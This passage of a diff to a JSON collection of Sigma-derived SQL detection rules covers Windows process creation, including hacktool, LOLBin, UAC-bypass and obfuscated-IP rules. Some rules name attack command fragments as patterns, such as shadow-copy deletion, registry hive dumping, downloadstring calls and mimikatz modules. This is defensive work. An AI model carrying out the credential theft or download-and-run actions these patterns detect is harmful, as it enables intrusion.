'%rundll32 %' ESCAPE '\\')) AND (CommandLine LIKE '%.dll%' ESCAPE '\\' AND (CommandLine LIKE '% StartW' ESCAPE '\\' OR CommandLine LIKE '%,StartW' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'TruffleSnout.exe' OR Image LIKE '%\\\\TruffleSnout.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml" + "filename": "proc_creation_win_hktl_trufflesnout.yml" }, { - "title": "Renamed Remote Utilities RAT (RURAT) Execution", - "id": "9ef27c24-4903-4192-881a-3adde7ff92a5", + "title": "Obfuscated IP Via CLI", + "id": "56d19cb4-6414-4769-9644-1ed35ffbb148", "status": "experimental", - "description": "Detects execution of renamed Remote Utilities (RURAT) via Product PE header field", + "description": "Detects usage of an encoded/obfuscated version of an IP address (hex, octal...) via commandline", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.collection", - "attack.command_and_control", - "attack.discovery", - "attack.s0592" + "attack.discovery" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Product = 'Remote Utilities' AND NOT ((Image LIKE '%\\\\rutserv.exe' ESCAPE '\\' OR Image LIKE '%\\\\rfusclient.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ping.exe' ESCAPE '\\' OR Image LIKE '%\\\\arp.exe' ESCAPE '\\') AND (CommandLine LIKE '% 0x%' ESCAPE '\\' OR CommandLine REGEXP ' [0-9]{7,13}'))" ], - "filename": "proc_creation_win_renamed_rurat.yml" + "filename": "proc_creation_win_susp_obfuscated_ip_via_cli.yml" }, { - "title": "IIS Native-Code Module Command Line Installation", - "id": "9465ddf4-f9e4-4ebd-8d98-702df3a93239", - "status": "test", - "description": "Detects suspicious 
IIS native-code module installations via command line", + "title": "PsExec Service Child Process Execution as LOCAL SYSTEM", + "id": "7c0dcd3d-acf8-4f71-9570-f448b0034f94", + "status": "experimental", + "description": "Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1505.003" + "attack.execution" ], "falsepositives": [ - "Unknown as it may vary from organisation to organisation how admins use to install IIS modules" + "Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND (CommandLine LIKE '%install%' ESCAPE '\\' AND CommandLine LIKE '%module%' ESCAPE '\\' AND (CommandLine LIKE '%/name:%' ESCAPE '\\' OR CommandLine LIKE '%-name:%' ESCAPE '\\'))) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\inetsrv\\\\iissetup.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_iis_appcmd_susp_module_install.yml" + "filename": "proc_creation_win_sysinternals_psexesvc_as_system.yml" }, { - "title": "MSHTA Suspicious Execution 01", - "id": "cc7abbd0-762b-41e3-8a26-57ad50d2eea3", - "status": "test", - "description": "Detection for 
mshta.exe suspicious execution patterns sometimes involving file polyglotism", - "author": "Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule)", + "title": "HackTool - SharpLdapWhoami Execution", + "id": "d9367cbb-c2e0-47ce-bdc0-128cb6da898d", + "status": "experimental", + "description": "Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1140", - "attack.t1218.005", - "attack.execution", - "attack.t1059.007", - "cve.2020.1599" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Programs that use the same command line flags" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\mshta.exe' ESCAPE '\\' AND (CommandLine LIKE '%vbscript%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.lnk%' ESCAPE '\\' OR CommandLine LIKE '%.xls%' ESCAPE '\\' OR CommandLine LIKE '%.doc%' ESCAPE '\\' OR CommandLine LIKE '%.zip%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpLdapWhoami.exe' ESCAPE '\\' OR OriginalFileName LIKE '%SharpLdapWhoami%' ESCAPE '\\' OR Product = 'SharpLdapWhoami' OR (CommandLine LIKE '% /method:ntlm' ESCAPE '\\' OR CommandLine LIKE '% /method:kerb' ESCAPE '\\' OR CommandLine LIKE '% /method:nego' ESCAPE '\\' OR CommandLine LIKE '% /m:nego' ESCAPE '\\' OR CommandLine LIKE '% /m:ntlm' ESCAPE '\\' OR CommandLine LIKE '% /m:kerb' ESCAPE '\\')))" ], - "filename": "proc_creation_win_mshta_susp_execution.yml" + "filename": "proc_creation_win_hktl_sharpldapwhoami.yml" }, { - "title": "Execute 
Files with Msdeploy.exe", - "id": "646bc99f-6682-4b47-a73a-17b1b64c9d34", - "status": "test", - "description": "Detects file execution using the msdeploy.exe lolbin", - "author": "Beyu Denis, oscd.community", + "title": "Lolbin Unregmp2.exe Use As Proxy", + "id": "727454c0-d851-48b0-8b89-385611ab0704", + "status": "experimental", + "description": "Detect usage of the \"unregmp2.exe\" binary as a proxy to launch a custom version of \"wmpnscfg.exe\"", + "author": "frack113", "tags": [ - "attack.execution", + "attack.defense_evasion", "attack.t1218" ], "falsepositives": [ - "System administrator Usage" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%verb:sync%' ESCAPE '\\' AND CommandLine LIKE '%-source:RunCommand%' ESCAPE '\\' AND CommandLine LIKE '%-dest:runCommand%' ESCAPE '\\' AND Image LIKE '%\\\\msdeploy.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\unregmp2.exe' ESCAPE '\\' OR OriginalFileName = 'unregmp2.exe') AND CommandLine LIKE '% /HideWMP%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_msdeploy.yml" + "filename": "proc_creation_win_lolbin_unregmp2.yml" }, { - "title": "Active Directory Database Snapshot Via ADExplorer", - "id": "9212f354-7775-4e28-9c9f-8f0a4544e664", + "title": "HackTool - SharpImpersonation Execution", + "id": "f89b08d0-77ad-4728-817b-9b16c5a69c7a", "status": "experimental", - "description": "Detects the execution of Sysinternals ADExplorer with the \"-snapshot\" flag in order to save a local copy of the active directory database.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects execution of the SharpImpersonation tool. 
Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively", + "author": "Sai Prashanth Pulisetti @pulisettis, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1552.001", - "attack.t1003.003" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1134.001", + "attack.t1134.003" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR OriginalFileName = 'AdExp') AND CommandLine LIKE '%snapshot%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpImpersonation.exe' ESCAPE '\\' OR OriginalFileName = 'SharpImpersonation.exe' OR (CommandLine LIKE '% user:%' ESCAPE '\\' AND CommandLine LIKE '% binary:%' ESCAPE '\\') OR (CommandLine LIKE '% user:%' ESCAPE '\\' AND CommandLine LIKE '% shellcode:%' ESCAPE '\\') OR (CommandLine LIKE '% technique:CreateProcessAsUserW%' ESCAPE '\\' OR CommandLine LIKE '% technique:ImpersonateLoggedOnuser%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sysinternals_adexplorer_execution.yml" + "filename": "proc_creation_win_hktl_sharp_impersonation.yml" }, { - "title": "PUA- IOX Tunneling Tool Execution", - "id": "d7654f02-e04b-4934-9838-65c46f187ebc", + "title": "Change Default File Association To Executable Via Assoc", + "id": "ae6f14e6-14de-45b0-9f44-c0986f50dc89", "status": "experimental", - "description": "Detects the use of IOX - a tool for port forwarding and intranet proxy purposes", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects when a program changes the default file association of any extension to an executable.\nWhen a file is opened, the default program used to open the file (also called the file association or handler) is checked. 
File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090" + "attack.persistence", + "attack.t1546.001" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\iox.exe' ESCAPE '\\' OR (CommandLine LIKE '%.exe fwd -l %' ESCAPE '\\' OR CommandLine LIKE '%.exe fwd -r %' ESCAPE '\\' OR CommandLine LIKE '%.exe proxy -l %' ESCAPE '\\' OR CommandLine LIKE '%.exe proxy -r %' ESCAPE '\\') OR (Hashes LIKE '%MD5=9DB2D314DD3F704A02051EF5EA210993%' ESCAPE '\\' OR Hashes LIKE '%SHA1=039130337E28A6623ECF9A0A3DA7D92C5964D8DD%' ESCAPE '\\' OR Hashes LIKE '%SHA256=C6CF82919B809967D9D90EA73772A8AA1C1EB3BC59252D977500F64F1A0D6731%' ESCAPE '\\') OR md5 = '9db2d314dd3f704a02051ef5ea210993' OR sha1 = '039130337e28a6623ecf9a0a3da7d92c5964d8dd' OR sha256 = 'c6cf82919b809967d9d90ea73772a8aa1c1eb3bc59252d977500f64f1a0d6731'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%assoc %' ESCAPE '\\' AND CommandLine LIKE '%exefile%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%.exe=exefile%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_iox.yml" + "filename": "proc_creation_win_cmd_assoc_tamper_exe_file_association.yml" }, { - "title": "Suspicious File Characteristics Due to Missing Fields", - "id": "9637e8a5-7131-4f7f-bdc7-2b05d8670c43", + "title": "Suspicious Process Start Locations", + "id": 
"15b75071-74cc-47e0-b4c6-b43744a62a2b", "status": "test", - "description": "Detects Executables in the Downloads folder without FileVersion,Description,Product,Company likely created with py2exe", - "author": "Markus Neis, Sander Wiebing", + "description": "Detects suspicious process run from unusual locations", + "author": "juju4, Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.006" + "attack.defense_evasion", + "attack.t1036", + "car.2013-05-002" ], "falsepositives": [ - "Unknown" + "False positives depend on scripts and administrative tools used in the monitored environment" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Description LIKE '\\?' ESCAPE '\\' AND FileVersion LIKE '\\?' ESCAPE '\\') OR (Description LIKE '\\?' ESCAPE '\\' AND Product LIKE '\\?' ESCAPE '\\')) OR (Description LIKE '\\?' ESCAPE '\\' AND Company LIKE '\\?' ESCAPE '\\')) AND Image LIKE '%\\\\Downloads\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%:\\\\RECYCLER\\\\%' ESCAPE '\\' OR Image LIKE '%:\\\\SystemVolumeInformation\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\fonts\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\help\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\drivers\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\cursors\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\system32\\\\tasks\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_file_characteristics.yml" + "filename": "proc_creation_win_rundll32_run_locations.yml" }, { - "title": "AgentExecutor PowerShell Execution", - "id": "7efd2c8d-8b18-45b7-947d-adfe9ed04f61", - "status": "experimental", - "description": 
"Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy \"Bypass\" or any binary named \"powershell.exe\" located in the path provided by 6th positional argument", - "author": "Nasreddine Bencherchali (Nextron Systems), memory-shards", + "title": "HTML Help HH.EXE Suspicious Child Process", + "id": "52cad028-0ff0-4854-8f67-d25dfcbc78b4", + "status": "test", + "description": "Detects a suspicious child process of a Microsoft HTML Help (HH.exe)", + "author": "Maxim Pavlunin, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.initial_access", + "attack.t1047", + "attack.t1059.001", + "attack.t1059.003", + "attack.t1059.005", + "attack.t1059.007", + "attack.t1218", + "attack.t1218.001", + "attack.t1218.010", + "attack.t1218.011", + "attack.t1566", + "attack.t1566.001" ], "falsepositives": [ - "Legitimate use via Intune management. You exclude script paths and names to reduce FP rate" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '\\\\AgentExecutor.exe' ESCAPE '\\' OR OriginalFileName = 'AgentExecutor.exe') AND (CommandLine LIKE '% -powershell%' ESCAPE '\\' OR CommandLine LIKE '% -remediationScript%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\hh.exe' ESCAPE '\\' AND (Image LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR Image LIKE '%\\\\CertUtil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\installutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\MSbuild.exe' ESCAPE '\\' OR Image LIKE '%\\\\MSHTA.EXE' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_agentexecutor.yml" + "filename": "proc_creation_win_hh_html_help_susp_child_process.yml" }, { - "title": "UtilityFunctions.ps1 Proxy Dll", - "id": "0403d67d-6227-4ea8-8145-4e72db7da120", + "title": "UAC Bypass Using IDiagnostic Profile", + "id": "4cbef972-f347-4170-b62a-8253f6168e6d", "status": "experimental", - "description": "Detects the use of a Microsoft signed script executing a managed DLL with PowerShell.", - "author": "frack113", + "description": "Detects the \"IDiagnosticProfileUAC\" UAC bypass technique", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.execution", "attack.defense_evasion", - "attack.t1216" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%UtilityFunctions.ps1%' ESCAPE '\\' OR CommandLine LIKE '%RegSnapin %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% /Processid:{12C21EA7-2EB8-4B55-9249-AC243DA8C666}%' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_lolbin_utilityfunctions.yml" + "filename": "proc_creation_win_uac_bypass_idiagnostic_profile.yml" }, { - "title": "Run PowerShell Script from ADS", - "id": "45a594aa-1fbd-4972-a809-ff5a99dd81b8", + "title": "Suspicious SYSTEM User Process Creation", + "id": "2617e7ed-adb7-40ba-b0f3-8f9945fe6c09", "status": "test", - "description": "Detects PowerShell script execution from 
Alternate Data Stream (ADS)", - "author": "Sergey Soldatov, Kaspersky Lab, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1564.004" - ], + "description": "Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)", + "author": "Florian Roth (Nextron Systems), David ANDRE (additional keywords)", "falsepositives": [ - "Unknown" + "Administrative activity", + "Scripts and administrative tools used in the monitored environment", + "Monitoring activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Get-Content%' ESCAPE '\\' AND CommandLine LIKE '%-Stream%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((IntegrityLevel = 'System' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND ((Image LIKE '%\\\\calc.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\ping.exe' ESCAPE '\\') OR (CommandLine LIKE '% -NoP %' ESCAPE '\\' OR CommandLine LIKE '% -W Hidden %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% /decode %' ESCAPE '\\' OR CommandLine LIKE '% /urlcache %' ESCAPE '\\' OR CommandLine LIKE '% -urlcache %' ESCAPE '\\' OR CommandLine LIKE '% -e% JAB%' ESCAPE '\\' OR CommandLine LIKE '% -e% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% -e% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% -e% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% -e% IAB%' ESCAPE '\\' OR CommandLine LIKE '% -e% PAA%' 
ESCAPE '\\' OR CommandLine LIKE '% -e% aQBlAHgA%' ESCAPE '\\' OR CommandLine LIKE '%vssadmin delete shadows%' ESCAPE '\\' OR CommandLine LIKE '%reg SAVE HKLM%' ESCAPE '\\' OR CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '%Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' OR CommandLine LIKE '%.downloadstring(%' ESCAPE '\\' OR CommandLine LIKE '%.downloadfile(%' ESCAPE '\\' OR CommandLine LIKE '% /ticket:%' ESCAPE '\\' OR CommandLine LIKE '%dpapi::%' ESCAPE '\\' OR CommandLine LIKE '%event::clear%' ESCAPE '\\' OR CommandLine LIKE '%event::drop%' ESCAPE '\\' OR CommandLine LIKE '%id::modify%' ESCAPE '\\' OR CommandLine LIKE '%kerberos::%' ESCAPE '\\' OR CommandLine LIKE '%lsadump::%' ESCAPE '\\' OR CommandLine LIKE '%misc::%' ESCAPE '\\' OR CommandLine LIKE '%privilege::%' ESCAPE '\\' OR CommandLine LIKE '%rpc::%' ESCAPE '\\' OR CommandLine LIKE '%sekurlsa::%' ESCAPE '\\' OR CommandLine LIKE '%sid::%' ESCAPE '\\' OR CommandLine LIKE '%token::%' ESCAPE '\\' OR CommandLine LIKE '%vault::cred%' ESCAPE '\\' OR CommandLine LIKE '%vault::list%' ESCAPE '\\' OR CommandLine LIKE '% p::d %' ESCAPE '\\' OR CommandLine LIKE '%;iex(%' ESCAPE '\\' OR CommandLine LIKE '%MiniDump%' ESCAPE '\\' OR CommandLine LIKE '%net user %' ESCAPE '\\'))) AND NOT ((CommandLine = 'ping 127.0.0.1 -n 5') OR (Image LIKE '%\\\\PING.EXE' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\DismFoDInstall.cmd%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\bin\\\\javaws.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\bin\\\\jp2launcher.exe' ESCAPE '\\' AND CommandLine LIKE '% -ma %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_run_script_from_ads.yml" + "filename": "proc_creation_win_susp_system_user_anomaly.yml" }, { - 
"title": "Suspicious Use of CSharp Interactive Console", - "id": "a9e416a8-e613-4f8b-88b8-a7d1d1af2f61", - "status": "test", - "description": "Detects the execution of CSharp interactive console by PowerShell", - "author": "Michael R. (@nahamike01)", + "title": "Password Protected Compressed File Extraction Via 7Zip", + "id": "b717b8fd-6467-4d7d-b3d3-27f9a463af77", + "status": "experimental", + "description": "Detects usage of 7zip utilities (7z.exe, 7za.exe and 7zr.exe) to extract password protected zip files.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1127" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Possible depending on environment. Pair with other factors such as net connections, command-line args, etc." + "Legitimate activity is expected since extracting files with a password can be common in some environement." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\csi.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') AND OriginalFileName = 'csi.exe')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description LIKE '%7-Zip%' ESCAPE '\\' OR (Image LIKE '%\\\\7z.exe' ESCAPE '\\' OR Image LIKE '%\\\\7zr.exe' ESCAPE '\\' OR Image LIKE '%\\\\7za.exe' ESCAPE '\\') OR OriginalFileName IN ('7z.exe', '7za.exe')) AND (CommandLine LIKE '% -p%' ESCAPE '\\' AND CommandLine LIKE '% x %' ESCAPE '\\' AND CommandLine LIKE '% -o%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_csi_use_of_csharp_console.yml" + "filename": "proc_creation_win_7zip_password_extraction.yml" }, { - "title": "Whoami Utility Execution", - "id": "e28a5a99-da44-436d-b7a0-2afc20a5f413", - "status": "test", - 
"description": "Detects the execution of whoami, which is often used by attackers after exploitation / privilege escalation", - "author": "Florian Roth (Nextron Systems)", + "title": "Start of NT Virtual DOS Machine", + "id": "16905e21-66ee-42fe-b256-1318ada2d770", + "status": "experimental", + "description": "Ntvdm.exe allows the execution of 16-bit Windows applications on 32-bit Windows operating systems, as well as the execution of both 16-bit and 32-bit DOS applications", + "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.defense_evasion" ], "falsepositives": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment", - "Monitoring activity" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\ntvdm.exe' ESCAPE '\\' OR Image LIKE '%\\\\csrstub.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_whoami_execution.yml" + "filename": "proc_creation_win_susp_16bit_application.yml" }, { - "title": "Hardware Model Reconnaissance Via Wmic.EXE", - "id": "3e3ceccd-6c06-48b8-b5ff-ab1d25db8c1d", + "title": "Suspicious FromBase64String Usage On Gzip Archive - Process Creation", + "id": "d75d6b6b-adb9-48f7-824b-ac2e786efe1f", "status": "experimental", - "description": "Detects the execution of WMIC with the \"csproduct\" which is used to obtain information such as hardware models and vendor information", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.execution", - "attack.t1047", - "car.2016-03-002" - ], + "description": "Detects attempts of decoding a base64 Gzip archive via PowerShell. 
This technique is often used as a method to load malicious content into memory afterward.", + "author": "frack113", "falsepositives": [ - "Unknown" + "Legitimate administrative script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%csproduct%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%FromBase64String%' ESCAPE '\\' AND CommandLine LIKE '%MemoryStream%' ESCAPE '\\' AND CommandLine LIKE '%H4sI%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wmic_recon_csproduct.yml" + "filename": "proc_creation_win_powershell_frombase64string_archive.yml" }, { - "title": "PUA - Advanced IP Scanner Execution", - "id": "bef37fa2-f205-4a7b-b484-0759bfd5f86f", - "status": "experimental", - "description": "Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.", - "author": "Nasreddine Bencherchali (Nextron Systems), @ROxPinTeddy", + "title": "Execution via Diskshadow.exe", + "id": "0c2f8629-7129-4a8a-9897-7e0768f13ff2", + "status": "test", + "description": "Detects using Diskshadow.exe to execute arbitrary code in text file", + "author": "Ivan Dyachkov, oscd.community", "tags": [ - "attack.discovery", - "attack.t1046", - "attack.t1135" + "attack.execution", + "attack.t1218" ], "falsepositives": [ - "Legitimate administrative use" + "False postitve can be if administrators use diskshadow tool in their infrastructure as a main backup tool with scripts." 
], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\advanced\\_ip\\_scanner%' ESCAPE '\\' OR OriginalFileName LIKE '%advanced\\_ip\\_scanner%' ESCAPE '\\' OR Description LIKE '%Advanced IP Scanner%' ESCAPE '\\') OR (CommandLine LIKE '%/portable%' ESCAPE '\\' AND CommandLine LIKE '%/lng%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\diskshadow.exe' ESCAPE '\\' AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%-s%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_advanced_ip_scanner.yml" + "filename": "proc_creation_win_lolbin_diskshadow.yml" }, { - "title": "Remote PowerShell Session Host Process (WinRM)", - "id": "734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8", - "status": "test", - "description": "Detects remote PowerShell sections by monitoring for wsmprovhost (WinRM host process) as a parent or child process (sign of an active PowerShell remote session).", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "Suspicious Windows Defender 